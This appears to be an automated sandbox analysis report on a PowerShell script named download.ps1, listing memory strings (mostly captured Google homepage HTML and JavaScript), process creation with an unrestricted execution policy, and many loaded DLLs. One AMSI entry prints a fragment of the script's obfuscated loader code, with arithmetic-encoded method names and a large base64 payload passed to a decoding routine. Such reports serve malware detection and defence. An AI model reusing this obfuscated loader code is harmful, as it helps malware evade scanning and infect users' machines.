src="https://www.google.com/images/hpp/red-gift-box-42px.png" width="32"><a href="https://www.google.com/url?q=https://www.google.com/shopping/holiday100%3Fsource%3Dh100_2024.googlehpp.google.hpp2_desktop.Gen_Pop&amp;source=hpp&amp;id=19045972&amp;ct=3&amp;usg=AOvVaw2x9QQBlpbB2fDZn9FaIXIh&amp;sa=X&amp;ved=0ahUKEwjAmq6AirKKAxUOyzgGHakuNqwQ8IcBCAY" rel="nofollow">Explore 100 of the most searched gifts of 2024</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="4SNt4K_9HBU4WeZcG1rOcA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="4SNt4K_9HBU4WeZcG1rOcA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAA
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4wX
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38511000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a.closest("[data-ved]"))?D(f)||"":"";f=f||"";if(a.hasAttribute("jsname"))a=a.getAttribute("jsname");else{var C;a=(C=a.closest("[jsname]"))==null?void 0:C.getAttribute("jsname")}google.log("rcm","&ei="+c+"&tgtved="+f+"&jsname="+(a||""))}}else F=a,E=[c]}window.document.addEventListener("DOMContentLoaded",function(){document.body.addEventListener("click",G)});}).call(this);</script></body></html>location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2Mz5SqgKiifxNCdmhKU-DaX7YInOhRM" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="4SNt4K_9HBU4WeZcG1rOcA">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwjAmq6AirKKAxUOyzgGHakuNqwQnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/red-gift-box-42px.png" width="32"><a href="https://www.google.com/url?q=https://www.google.com/shopping/holiday100%3Fsource%3Dh100_2024.googlehpp.google.hpp2_desktop.Gen_Pop&amp;source=hpp&amp;id=19045972&amp;ct=3&amp;usg=AOvVaw2x9QQBlpbB2fDZn9FaIXIh&amp;sa=X&amp;ved=0ahUKEwjAmq6AirKKAxUOyzgGHakuNqwQ8IcBCAY" rel="nofollow">Explore 100 of the most searched gifts of 2024</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="4SNt4K_9HBU4WeZcG1rOcA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="4SNt4K
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 9QQBlpbB2fDZn9FaIXIh&amp;sa=X&amp;ved=0ahUKEwjAmq6AirKKAxUOyzgGHakuNqwQ8IcBCAY" rel="nofollow">Explore 100 of the most searched gifts of 2024</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="4SNt4K_9HBU4WeZcG1rOcA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="4SNt4K_9HBU4WeZcG1rOcA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="4SNt4K_9HBU4WeZcG1rOcA">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: classification engineClassification label: mal68.evad.winPS1@3/11@2/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ra1ni3ii.4qg.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $cdye4qilvkb83p0.(([system.String]::new(@((-429+496),(6055-5944),(5048-(10409-5473)),(9568-(-420+(9019+(8442688/9956)))),(2596-(5217424/(19656728/(6347+3117)))),(470196/(4850-(5408-(-202+4996))))))))( $ce0t1yukvgarnz5 ) $cdye4qilvkb83p0.(([system.String]::new(@((662630/9890),(66420/(-6450+7065)),(-4200+(2729+(10112-8530))),(9293-9178),(-5771+(25179136/4288))))))()$devyrft32glosu9.(([char[]]@((-8800+(10088-1221)),(6329-(50116376/8056)),(342546/(1042+2044)),(4240-(-51+4176)),(-1590+(4325578/(429+2129)))) -join ''))()[byte[]] $42e0lhg9yozcmxj = $ce0t1yukvgarnz5.(([char[]]@((168420/2005),(1123098/(29807628/2946)),(-10053+10118),(1003884/(16929-(9705-1582))),(991116/8694),(-5524+(12949-(-2088+(18386-(17478-(63758952/7494)))))),(347149/2869)) -join ''))() $u6le5dhc2jb1gxy=$42e0lhg9yozcmxj return $u6le5dhc2jb1gxy}[System.Text.Encoding]::ascii.(([system.String]::new(@((-7004+(12804-(-3837+9566))),(163620/(8249-6629)),(8539-8423),(-9312+9395),(161124/(-8551+(89042520/(-829+(9567+220))))),(1002516/(13152-(15492690/3555))),(2302-(110+(-2826+4913))),(-2501+(1406+(-5231+(11299-4863)))),(4458-(6971-2616))))))((ehrbplwqc7t4xysu6d3ji8k9om1 "KroxaWt0YWJxMNeq7L8lPhnyzi813yom3ahTzvgNlyd3UXlVup4FahNaHUN9NjMDIkAssEYmutmOy1mEr4oRsEivc/kopePRqblG4OOABrVLg4WPS97ourDDfx+EyIOBOi7lFJ2ciN+aX6eKS8/TlaWRpOHSf5QKSENIl4GWqoniH2QKyNDXqvyrXtkMzPXFvsQG9padiIESp23R+s5PGICWk6esvZmxG0Ta0RWPlaPm84tpuvYrq/MVWtStapLKVNyQRqzB7/LjU9bKQgz/W4ws7tGSgtzu5qjGmqSztwTbTFOxpGKiHMDVFJ/XvyPF7b+a5a+DEg5UhctHtFBmNbjoDFv76UiBn/zHR422/BGij5muXHgMHZAMLEe69Cm45ebhC94PlXSj7iCC2qdt/ghawITthr5l78L0VQ2t7//ybvXdeRgVWJtcn3JAx8JGqK9Arzt+Kn9c/S+hvkBYsBIrCQzQlsyHp69apgK/zHQOgkNRPGoUlaNhOvoAWQvEtQ4ml5eAmN2qiglJyNrUBqSbPX4LCgZD0s+UjjQrnv22Hx0q+GYWFxMFEJyN9qUYqw5BG4SfTtwNQoTku5Ussti1kwT7402M+KRiJxDiP1g6oDyCqC9UhIfDvNxiRluHnjoyJtVxyOXF2UVM6SPgmV9zHuxEhu/rPcsfjqwikTUInNOhmZ436+jb759W3B9rU1BU0wAdyqAW9u8JOuqf5sacET4+/Rcf2b/Xsnj71dPOSvCn7ccoBJCeKVteNhnkXMej/n2Wf1PExcbGTewmVKyo1zsS443MVWTV+C7id/AT1iWqQZvi2KemE3+xcWNFnFzNlD8nzBs4lS7ttJvJIshkFee69q5VbFawqFW/xrgvQs9Lu4C3TM2ujOmprar9nJag4ZJBNsc7qOcVLhLC1L2msz5/Kdot+pmpcm8MrzuCet7gpB0gVDyJpHrw91Rt3pCl910Tlws+aZv5Cq5kEpqGoKfoy73dIv4WpqQKm46vD4bCMxUlv5ibb5Teb3QJaM7Xn8DjFtzKTwRBjEgBd1iFWwkYo2n7HP4K99yjyxafwZba/vLUjozDfxwMyJ914g2L2PcxihfnycxOuxLt/D9QOa2t1sC6lcHCqfYXjAf5IbOBNTmpvdohnwD+tPKI+aIt+e3YjUbjBvNLMUpzNd7Bat1Iw8F6VwRvororHoCeRxULT8C4BAPX57oSP8nG2mReBmTkkrZ0XHdqVlr/aQEyvmr7qXmu9GLsrWJ2C6P70rftxo7u9jUKkpCko2Vp6E/FhYq5wgOGT0VIhdL5iKjsnVNNaBG7v+ttRTCS0T98oRpj7bUfkQ2behLs1/T9jJTjXxU6Z2npxKg2epQ3SFctKkG5W3Ds8wU6INO5934Y13qjUl7Dhwfpbb9TC9omed3yvZkXRQ2B3Wtxgg6oyU4Ej9OZMbW5VVC0b+cxMHA/NcnbloIWyp3K8mOti2b/MOOxwYnoKkVHaSPt1GbCp3wngsD8UHsScl2wTugPqdkX0GYcBW5Ai1YXYVgLvqk+viwvlRWBlLWvZAqZYIkZcwM0N9RiSbT2vyMF//lbY1gsMB5t8S0ARbjlNfJTkrZG++PegWUmHE4vSX+1lTUHuThi+5HlffXgw3ZiSv/OfQW/kA16s4a52glIJMErJlC6rajhJR2QXGzlTuRgMlRumC+d4wBLPey71Vnw5iiUf+9WaBbZniFUQaFh1WjQAHtoWMD4nKtrnpoeIORRvbOAX3GVxHr1Fio9RhZqB/nzF3aH4FeFQ1qiBfhpEI6vna7M
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
